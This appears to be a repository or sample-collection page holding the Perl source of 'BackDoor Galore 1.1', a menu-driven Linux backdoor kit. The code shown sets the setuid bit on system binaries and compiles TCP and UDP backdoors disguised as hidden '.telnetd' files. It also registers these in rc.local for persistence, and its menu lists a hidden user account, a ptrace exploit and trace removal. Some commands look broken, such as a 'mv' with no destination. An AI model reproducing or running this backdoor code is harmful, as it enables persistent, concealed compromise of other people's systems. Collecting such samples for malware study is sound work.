-
Marius Genheimer authoredMarius Genheimer authored
Linux.Galore.11.Backdoor.perl 5.44 KiB
#!/usr/bin/perl
# BackDoor Galore 1.1 (fixed!)
# Author: NTFX <ntfx@legion2000.tk>
# Legion2000 Security Research 1995 -
# This is a simple perl script which backdoors a system for you.
# Updated, set wrong rc.local patch and didnt execute them, blah!
# thats what happens when you code at 4am.
###################################
&option();
sub option() {
system("clear");
print "##################################\n";
print "#Backdoor Galore By NTFX #\n";
print "#Contact: <ntfx\@legion2000.tk> #\n";
print "#Legion2000 Security Research (c)#\n";
print "##################################\n";
print "#[ 1] Do this first of all. #\n"; # must do this cause im lazy.
print "#[ 2] Create setuid binary's. #\n"; # /usr/bin/mail & /usr/bin/find.
print "#[ 3] Open up TCP backdoor. #\n"; # 12350 # hid /usr/sbin/.telnetd.
print "#[ 4] Open up UDP backdoor. #\n"; # 65535 # hid /usr/sbin/.telnetd.
print "#[ 5] Add Cron Sched'd backdoor. #\n"; # 10001 # only open 3 hours a day.
print "#[ 6] Add unsuspicious user. #\n"; # gpm or news prob best.
print "#[ 7] Hide ptrace Exploit. #\n"; # /dev/.pts.
print "#[ 8] Removes Traces #\n";
print "#[ 9] Social Calls. #\n"; # Sociable Greetings.
print "#[10] Exit the backdoor Script. #\n"; # quit the backdoor.
print "##################################\n";
print "#Enter Option:";
chomp($number=<STDIN>);
if($number == "1") { &di() }
if($number == "2") { &uid() }
if($number == "3") { &tcp() }
if($number == "4") { &udp() }
if($number == "5") { &cro() }
if($number == "6") { &usr() }
if($number == "7") { &ptr() }
if($number == "8") { &rem() }
if($number == "9") { &soc() }
if($number == "10") { &ex() }
else { &option() } }
##################
sub di() {
system ("clear");
system ("cd $HOME; mkdir ntfx script; mv *.c $HOME/ntfx; mv *pl $HOME/script");
sleep 2; }
##################
sub uid() {
system ("clear");
print "we will now make a setuid file in /usr/bin";
system ("cd /usr/bin; chmod +s mail; cd $HOME");
print "mail is now +s\n"; #edit as you wish.
system ("cd /usr/bin; chmod +s find; cd $HOME");
print "find is now +s\n"; #edit as you wish.
sleep 1; }
##################
sub tcp() {
system ("clear");
print "We are now going to create a basic tcp backdoor\n";
system ("cd ../ntfx; gcc tcp.c -o tcp; mv /usr/sbin/.telnetd; echo
/usr/sbin/.telnetd >> /etc/rc.d/rc.local; /usr/sbin/.telnetd &"); # starts on boot.
print "tcp backdoor is now running on specified port and enabled at boot\n";
sleep 1; }
###################
sub udp() {
system ("clear");
print "We are now going to install a basic udp backdoor\n";
system ("cd ../ntfx; gcc udp.c -o udp; mv /usr/sbin/.telnetd.; echo
/usr/sbin/.telnetd. >> /etc/rc.d/rc.local; /usr/sbin/.telnetd. &");
print "udp backdoor now running on specified port and enabled at boot\n";
sleep 1; }